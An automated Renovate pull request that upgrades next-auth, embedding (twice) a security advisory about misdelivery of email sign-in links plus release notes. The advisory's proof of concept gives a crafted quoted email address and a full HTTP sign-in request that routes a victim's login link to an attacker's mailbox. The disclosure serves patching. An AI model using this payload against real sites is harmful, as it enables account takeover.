fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
next-auth (source)	^5.0.0-beta.27 → ^5.0.0-beta.30
next-auth (source)	^5.0.0-beta.29 → ^5.0.0-beta.30

GitHub Vulnerability Alerts

GHSA-5jpx-9hw9-2fx4

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version	Afftected
4.24.11	Yes
5.0.0-beta.29	Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@​auth/prisma-adapter"
import { prisma } from "@​/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})

POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

---

NextAuthjs Email misdelivery Vulnerability

GHSA-5jpx-9hw9-2fx4

More information

Details

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version	Afftected
4.24.11	Yes
5.0.0-beta.29	Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@​auth/prisma-adapter"
import { prisma } from "@​/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})

POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Severity

• CVSS Score: Unknown
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

• https://github.com/nextauthjs/next-auth/security/advisories/GHSA-5jpx-9hw9-2fx4
• https://github.com/nextauthjs/next-auth/commit/82efcf81f218aae43683f8dd2f7c260ef69b3ece
• https://github.com/nextauthjs/next-auth/commit/8f3b2c7af0fe08973a12f616517c3ec85a5cd172
• https://github.com/nextauthjs/next-auth

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

nextauthjs/next-auth (next-auth)

v5.0.0-beta.30

Compare Source

v5.0.0-beta.29

Compare Source

What's Changed

• fix: always check typeof BroadcastChannel by @​maiconcarraro in #​12937
• fix(providers): enable OIDC capabilities for Keycloak by @​jvllmr in #​12964
• Fix typo: succesful -> successful by @​changeworld in #​12973
• Fix undefined providerId by @​Regloom in #​12947
• docs: fix typo profie -> profile by @​changeworld in #​12987
• docs: Fix typo initalization -> initialization by @​changeworld in #​12989
• docs: Fix typo depencies -> dependencies by @​changeworld in #​12983
• docs: add missing "key" prop for form element in providerMap iterator by @​frshaad in #​13023
• chore(docs): fix typo Minmum -> Minimum by @​changeworld in #​13007
• chore(docs): fix typo Avaliable Scopes -> Available Scopes by @​changeworld in #​13009
• fix(adapter): transistion to surrealdb@^1.0.0 by @​dvanmali in #​11911
• Fix(provider): Mailgun region selection by @​benhovinga in #​13027
• fix(next-auth): add missing middleware wrapper type to auth function by @​k-taro56 in #​13026
• Update extending-the-session.mdx by @​adriancuadrado in #​13064
• fix(adapters): handle P2025 errors without importing Prisma namespace by @​karl-barbour in #​13061
• chore(docs): Fix syntax error in RBAC guide by @​benhovinga in #​12733
• fix(provider): Microsoft Entra ID by @​benhovinga in #​12616
• Update index.ts by @​adriancuadrado in #​13066

New Contributors

• @​maiconcarraro made their first contribution in #​12937
• @​jvllmr made their first contribution in #​12964
• @​Regloom made their first contribution in #​12947
• @​frshaad made their first contribution in #​13023
• @​dvanmali made their first contribution in #​11911
• @​adriancuadrado made their first contribution in #​13064
• @​karl-barbour made their first contribution in #​13061

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.28...next-auth@5.0.0-beta.29

v5.0.0-beta.28

Compare Source

What's Changed

• chore(docs): improve documentation in Credentials provider by @​halvaradop in #​12873
• fix(prisma): import PrismaClientKnownRequestError for edge runtime compatibility by @​twinh in #​12755
• docs: fix typo in Asgardeo provider by @​brionmario in #​12943
• fix(core): AuthError.type should not be internal by @​ThangHuuVu in #​12946
• fix(qwik): don't build server deps on client by @​wmertens in #​12723
• fix: correct typo in signin.mdx by @​nougat-sw in #​12939
• Fix file in Google example by @​AlexWendland in #​12938

New Contributors

• @​twinh made their first contribution in #​12755
• @​brionmario made their first contribution in #​12943
• @​wmertens made their first contribution in #​12723
• @​nougat-sw made their first contribution in #​12939
• @​AlexWendland made their first contribution in #​12938

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.27...next-auth@5.0.0-beta.28

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.